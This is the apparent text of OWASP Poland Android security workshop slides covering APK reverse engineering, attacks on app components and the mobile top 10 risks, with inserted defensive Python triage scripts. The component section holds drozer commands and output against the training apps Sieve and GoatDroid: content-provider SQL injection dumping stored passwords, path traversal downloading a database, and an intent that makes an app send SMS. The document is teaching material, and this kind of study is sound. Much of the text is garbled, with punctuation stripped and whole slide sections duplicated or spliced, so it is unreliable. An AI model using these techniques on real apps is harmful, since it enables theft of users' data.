  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → Smali
• Apktool
  – Open-source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali files
Demo
Application Layer
• SMS client app
• Dialer
• Web browser
• Contact manager
APK: how it works
Android Application Security
• Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install-time security decisions
• Android 6.0 security release
Android 6.0
• Runtime Permissions
• Verified Boot
• Hardware-Isolated Security
• Fingerprints
• SD Card Adoption
• Clear Text Traffic
• System Hardening
• USB Access Control
Defense layers (Google Play)
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps.
The vast majority of installs come from Google Play.
Verify Apps
Apps are verified prior to install.
Warn for or block Potentially Harmful Applications.
Over 10 million installs verified every day.
Verifying is on and visible when needed.
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography, permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
Activities, Services, Content providers, Broadcast receivers
AndroidManifest.xml defines in which way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions:
  <uses-permission android:name="string" />
  <permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
Example component attributes (Activities, Services, Content providers, Broadcast receivers):
• debuggable
• enabled
• exported
• permission
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested actions/data.
  Intent intent = new Intent(Intent.ACTION_VIEW);
  intent.setData(Uri.parse("http://www.google.com"));
  String pack = "com.android.browser";
  ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
  intent.setComponent(comp);
  startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC - the leading security assessment framework for Android.
Manual on installation and usage
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
  dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed in the default package of AppUse together with adb, so it's enough to just „click-and-play”.
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app.
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it via intents it's possible to achieve the following:
  – Modify data in the background
  – Tricking the user
  – Leaking sensitive information
Activity components attacks
• General hijacking scheme
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities:
  dz> run app.activity.info -a com.mwr.example.sieve
  Package: com.mwr.example.sieve
    com.mwr.example.sieve.FileSelectActivity
    com.mwr.example.sieve.MainLoginActivity
    com.mwr.example.sieve.PWList
  dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML data stores
– Plain text configuration files
– Cookie stores
– SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the SD card before and after installing the application
• Analyze the package files at different stages:
adb pull /data/data/<apk_package_name>
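Added example, not from the workshop: a small Python triage script for the "what to look for" and "how to find" steps above. It assumes the app directory was pulled with adb pull /data/data/<package> and that a listing was captured with adb shell ls -lR /data/data/<package>; the listing, the SharedPreferences file and the sensitive-key regex in the block are constructed for this example, not real output from any application.

```python
"""Added example (not from the workshop): triage of a pulled app data directory for
the signs listed in the 'what to look for' and 'how to find' slides.
Assumed workflow: adb pull /data/data/<package> ./appdata and a listing captured with
adb shell ls -lR /data/data/<package>. The listing, the SharedPreferences file and the
sensitive-key regex below are constructed for this example."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Constructed `ls -l` lines in Android's format: mode links owner group size date time name.
SAMPLE_LISTING = """\
-rw-rw---- 1 u0_a123 u0_a123 24576 2016-02-24 10:00 databases/database.db
-rw-rw-rw- 1 u0_a123 u0_a123   312 2016-02-24 10:00 shared_prefs/credentials.xml
-rw-r--r-- 1 u0_a123 u0_a123    88 2016-02-24 10:00 files/config.txt
drwxrwx--x 2 u0_a123 u0_a123  4096 2016-02-24 10:00 cache
"""

# Constructed SharedPreferences file, as written to disk by the framework.
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="username">alice</string>
    <string name="password">hunter2</string>
    <boolean name="remember_me" value="true" />
</map>
"""

# Heuristic key names worth a look; extend per application (assumption of this example).
SENSITIVE_KEY = re.compile(r"pass(word|wd)?|secret|token|pin|session|auth|api_?key", re.I)

def find_world_accessible(listing: str) -> List[Tuple[str, str]]:
    """Return (path, mode) for entries whose 'other' bits grant read or write: exactly what
    MODE_WORLD_READABLE/MODE_WORLD_WRITEABLE or a careless chmod produce."""
    findings = []
    for line in listing.splitlines():
        parts = line.split(None, 7)
        if len(parts) < 8:
            continue
        mode, name = parts[0], parts[7]
        other = mode[7:10]          # the rwx triplet for "other"
        if "r" in other or "w" in other:
            findings.append((name, mode))
    return findings

def find_plaintext_secrets(prefs_xml: str) -> Dict[str, str]:
    """Return preference entries whose key looks sensitive; their value is what anyone with
    file access (root, a backup, a world-readable mode) reads straight off the disk."""
    hits = {}
    for elem in ET.fromstring(prefs_xml):
        key = elem.get("name", "")
        if SENSITIVE_KEY.search(key):
            hits[key] = elem.text if elem.text is not None else elem.get("value", "")
    return hits

def triage(listing: str, prefs_xml: str) -> List[str]:
    """Combine both checks into the list of findings you would paste into a report."""
    report = [f"world-accessible: {path} ({mode})" for path, mode in find_world_accessible(listing)]
    report += [f"plaintext secret in shared_prefs: {k}={v}"
               for k, v in find_plaintext_secrets(prefs_xml).items()]
    return report

if __name__ == "__main__":
    for finding in triage(SAMPLE_LISTING, SAMPLE_PREFS):
        print(finding)
```

Run it against the real pulled tree by replacing the two sample strings with the captured listing and each file under shared_prefs/; the database files still need to be opened with sqlite3 separately.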
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (note: DevicePolicyManager.setStorageEncryption() only requests device-wide storage encryption and requires a device admin; it does not encrypt your app's own files, so encrypt those yourself)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure no shared preferences are created with MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
– Using known weak protocol versions or ciphers (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
if (presented_cert == pinned_cert)
    start_connection();
else
    drop_connection();
• In practice pin the public key (SubjectPublicKeyInfo) rather than the whole certificate and ship a backup pin, otherwise a routine certificate renewal cuts the app off from its own server
Cert pinning - reality
• Researchers from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check whether all traffic is encrypted)
• Use Mallodroid:
mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data to leak
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, via ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (watch what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or elevate your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by starting exported activities directly with Drozer:
dz> run app.activity.start --component <package_name> <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the password strength policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed; they must be enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or using a sound one in an insecure way
• A few reminders (yeah, I know you know it…):
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Convert the APK with dex2jar and review the resulting jar in JD-GUI (or Luyten, which often gives more complete output)
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4, MD5, SHA-1, etc.)
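Added example for the M3 and M6 "how to find" steps, not part of Mallodroid, drozer or the slides: once dex2jar and JD-GUI/Luyten have produced Java source, a scan over that source for the anti-patterns both slides list: trust-all TrustManagers and disabled hostname verification (the classes Mallodroid hunts in the dex), weak ciphers and hashes, hardcoded symmetric keys and obsolete SSL protocol constants. The rule list and the three sample source files are constructed for this example; Cipher.getInstance("AES") is flagged on purpose because on Android/Java it silently means AES/ECB/PKCS5Padding.

```python
"""Added example (not from the slides, not Mallodroid or drozer code): pattern scan over
decompiled Java (dex2jar + JD-GUI/Luyten output) for the TLS and crypto anti-patterns named
in M3 and M6. The rules and the sample sources below are constructed for this example."""
import re
from typing import Dict, List, Tuple

# Each rule: (finding label, regex applied to one line of decompiled Java).
RULES: List[Tuple[str, re.Pattern]] = [
    ("trust-all TrustManager (empty checkServerTrusted)",
     re.compile(r"public\s+void\s+checkServerTrusted\s*\([^)]*\)\s*(throws\s+[\w.]+\s*)?\{\s*\}")),
    ("hostname verification disabled",
     re.compile(r"ALLOW_ALL_HOSTNAME_VERIFIER|public\s+boolean\s+verify\s*\([^)]*\)\s*\{\s*return\s+true;")),
    ("weak or unauthenticated cipher",
     # bare "AES" is AES/ECB on Android; ECB leaks plaintext structure and is unauthenticated
     re.compile(r'Cipher\.getInstance\(\s*"(DES|DESede|RC4|ARCFOUR|Blowfish|AES/ECB[^"]*|AES)"')),
    ("weak hash",
     re.compile(r'MessageDigest\.getInstance\(\s*"(MD2|MD4|MD5|SHA-?1)"')),
    ("hardcoded symmetric key",
     re.compile(r'new\s+SecretKeySpec\(\s*"[^"]+"\.getBytes\(')),
    ("deprecated SSL protocol",
     re.compile(r'SSLContext\.getInstance\(\s*"(SSL|SSLv2|SSLv3|TLSv1)"')),
]

def scan_source(path: str, text: str) -> List[Dict[str, object]]:
    """One finding per (rule, line) hit, with file, line number and the offending line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in RULES:
            if pattern.search(line):
                findings.append({"file": path, "line": lineno, "issue": label, "code": line.strip()})
    return findings

def scan_tree(sources: Dict[str, str]) -> List[Dict[str, object]]:
    """Scan a {relative path: source text} mapping, e.g. built by walking the decompiler output dir."""
    out = []
    for path in sorted(sources):
        out.extend(scan_source(path, sources[path]))
    return out

# Constructed decompiler output, shaped like the code the Hannover study found in real apps.
SAMPLE_SOURCES = {
    "com/example/net/TrustAll.java": """\
public final class TrustAll implements X509TrustManager {
    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException { }
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException { }
    public X509Certificate[] getAcceptedIssuers() { return null; }
}
""",
    "com/example/net/Http.java": """\
HttpsURLConnection.setDefaultHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
SSLContext ctx = SSLContext.getInstance("TLS");
""",
    "com/example/crypto/Vault.java": """\
SecretKeySpec key = new SecretKeySpec("s3cr3tk3y1234567".getBytes(), "AES");
Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
MessageDigest md = MessageDigest.getInstance("MD5");
""",
}

if __name__ == "__main__":
    for f in scan_tree(SAMPLE_SOURCES):
        print(f"{f['file']}:{f['line']}: {f['issue']}\n    {f['code']}")
```

Treat the output as a worklist, not a verdict: a checkServerTrusted that calls a real validator before returning is fine, and a hardcoded key in a test class is not the same finding as one in the production cipher path. Every hit still needs the surrounding code read.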
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device; use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
– Another application, via an Intent/content provider
– A shared file
– A server response
– A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
// implicit Intent: any app whose filter matches ACTION_VIEW + this URI may handle it
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
// implicit Intent asking whichever camera app is registered to take a picture
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm://" scheme allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Be careful with intent-filters: a component that declares one is exported by default, and an implicit Intent matching that filter can be claimed by any other app that declares the same filter; the system then shows a chooser dialog and the user picks which app handles it
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
– Verify if the session expires (copy a cookie and try to use it after 30 minutes)
– Verify if the session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
– Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should a session REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
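Added example, not from the slides: a minimal server-side session store that applies the four M9 mitigations above (server-side invalidation, an expiry tuned to the app, destruction of superseded tokens, CSPRNG-generated tokens), shown next to the "device ID as session token" anti-pattern from the "how to find" slide. The timeout values and the injectable clock are assumptions of this example so the expiry checks run offline; a real deployment keeps the store in a shared backend, not in process memory.

```python
"""Added example (not from the slides): a minimal server-side session store applying the
M9 mitigations, next to the 'device ID as session token' anti-pattern. The timeouts are
assumptions for this example; the clock is injectable so the expiry checks run offline."""
import hmac
import secrets
import time
from typing import Callable, Dict, Optional

IDLE_TIMEOUT = 30 * 60       # matches the 30-minute replay check on the 'how to find' slide
ABSOLUTE_TIMEOUT = 8 * 3600  # tune to your application; assumed value for this example

def weak_token(device_id: str, login_time: int) -> str:
    """Anti-pattern: built from values an attacker can know or observe, so it is guessable,
    identical across logins, and nothing on the server side can 'expire' it."""
    return f"{device_id}-{login_time}"

class SessionStore:
    def __init__(self, now: Callable[[], float] = time.time) -> None:
        self._now = now
        self._sessions: Dict[str, dict] = {}

    def create(self, user: str) -> str:
        # 256 bits from the OS CSPRNG, never derived from device ID, user name or time.
        token = secrets.token_urlsafe(32)
        t = self._now()
        self._sessions[token] = {"user": user, "created": t, "last_seen": t}
        return token

    def _find(self, token: str) -> Optional[str]:
        # Constant-time comparison so lookup timing does not leak token prefixes.
        if not token.isascii():
            return None
        for stored in self._sessions:
            if hmac.compare_digest(stored, token):
                return stored
        return None

    def resolve(self, token: str) -> Optional[str]:
        """Return the user of a live session, or None. Expired sessions are destroyed on the
        server here, so a copied cookie replayed after the idle timeout is dead."""
        key = self._find(token)
        if key is None:
            return None
        s = self._sessions[key]
        t = self._now()
        if t - s["last_seen"] > IDLE_TIMEOUT or t - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[key]
            return None
        s["last_seen"] = t
        return s["user"]

    def destroy(self, token: str) -> bool:
        """Server-side invalidation (logout); the client forgetting its cookie is not enough."""
        key = self._find(token)
        if key is None:
            return False
        del self._sessions[key]
        return True

    def switch_user(self, old_token: str, new_user: str) -> Optional[str]:
        """Authentication state change: the old session dies and a fresh token is issued,
        so nothing the previous user held keeps working for the new one."""
        if self.resolve(old_token) is None:
            return None
        self.destroy(old_token)
        return self.create(new_user)

    def live_sessions(self) -> int:
        return len(self._sessions)

if __name__ == "__main__":
    store = SessionStore()
    tok = store.create("alice")
    print(tok, store.resolve(tok), store.destroy(tok), store.resolve(tok))
```

The Burp checks from the "how to find" slide map directly onto resolve() (replay after 30 minutes), switch_user() (session destroyed on authentication state change) and the token source in create() (nothing to guess).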
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an APK
Getting our APK file
• From the phone:
– APK Optic
– Astro File Manager
• Using ADB
• Use APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly (Smali) code
• Why disassemble and not decompile?
Decompiling
DEX → JAR → Java
Decompiling - dex2jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows using any existing Java decompiler on the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten
– Java decompilers
– Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → Smali
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing an APK
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
• Note: a repackaged APK no longer carries the original developer's signature, so it cannot be installed as an update over the original app; uninstall the original first
Demo time
Demo: decompiling with Luyten
Demo: modifying Smali files
Demo
APK: how it works
Android Application Security
• Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install-time security decisions
• Android 6.0 security release
Android 6.0
• Runtime permissions
• Verified Boot
• Hardware-isolated security
• Fingerprints
• SD card adoption
• Clear text traffic
• System hardening
• USB access control
Defense layers (Google Play and the platform)
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
• By default only Google Play and other pre-installed app stores are allowed to install apps
• The vast majority of installs come from Google Play
Verify Apps
• Apps are verified prior to install
• Warn for or block Potentially Harmful Applications
• Over 10 million installs verified every day
• Verifying is on, and visible when needed
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography and permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
– Isolation
– Privilege separation
• How sensitive data is transmitted
– Extra-device communication
